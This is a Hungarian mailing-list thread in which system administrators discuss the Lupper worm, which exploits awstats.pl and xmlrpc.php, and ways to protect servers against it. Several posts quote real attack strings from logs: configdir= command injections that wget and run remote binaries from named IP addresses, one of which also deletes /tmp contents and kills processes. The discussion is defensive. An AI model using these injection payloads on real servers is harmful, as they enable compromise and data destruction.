Lupper.worm

kivalo otlet! :-D nah asszem ez mar eleg kemeny paranoia.

>> Valaki elmondaná nekem, hogy ez miért Linux hiba? A féreg neve Linux/Lupper.worm

a kozlemenyben az all, hogy ez a linux/slapper leszarmazottja, annal pedig ez: "The worm only attacks specific Linux distributions by sending an initial[...]"

Micskó Gábor wrote:
> Mivel leszármazott, azokhoz hasonlóan scanneli a hálózatot, ``fertőz'', és
> terjed tovább. A sikeres támadás esetén az UDP 7111 / UDP 7222 portokon
> hallgat, és a /tmp egy lupii nevű file-t dob.
> (Valaki elmondaná nekem, hogy ez miért Linux hiba? A féreg neve
> Linux/Lupper.worm.)
Gondolom a kulcs a "sikeres támadás esetén az UDP 7111 / UDP 7222
portokon hallgat" mondatban keresendő. (linuxos binárist nyom fel)

jo, akkor az "attacks" baromsag, a "fertoz" szerencsesebb

Gyorsan elolvastam a McAffe oldalán a leírást.

Azt vettem ki belőle, hogy csak akkor tud érvényesülni, ha php -n vagy valamilyen cgi -n keresztül le tudja magát tölteni. Pl. ha a php -ben az allow_url_fopen tiltva van és persze a rendszerparancsok meghívása is, akkor tud más módon fertőzni? Pillanatnyilag fut az awstats is, mert ezzel generálom a statisztikákat. Jelenthet ez fertőzési veszélyt? Ideig szüneteltessem az awstats -ot?

laci

slashdot-on is kinnt van. az egyik hozzaszolas:

The command it runs is:

|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

It is passed to awstats.pl in a request like:

GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1

There are also POST request to xmlrpc.php pages, like:

POST /drupal/xmlrpc.php HTTP/1.1

So if you have /tmp mounted noexec this should not be a problem.

László László wrote:
> Ideig szüneteltessem az awstats -ot?

szerintem csak siman cronbol csinald meg a static stat-ot, nem kell ide
cgi meg varazslat. imho.

Köszike! El is kezdtem.

Na de ez nem egy mai awstats hiba! Aki nem upgradelt az magára vessen.

Ilyent is találtam:

/stats/awstats/awstats.pl?configdir=|echo ;cd /tmp;rm -rf *;killall -9 perl;wget members.lycos.co.uk/sugi/a.txt;perl a.txt;echo ;rm -rf a.txt*;echo|

Ezen nem segit a noexec. De tovabbi lehetoseg lehet a wget eltavolitasa vagy csak adott user futtatthassa.

es meg ram neznek hulyen mikor netfilterben csak a sources.confban
szereplo szerverek fele engedem meg az outgoing http requesteket :-)

es a netfilterben azt is beallitod, hogy a sources.confban szereplo szerverekre csak a root mehet ki, vagy azt mar nem es egy dns poisoning technikaval kiegeszitve barki barmit letolthet? ;-)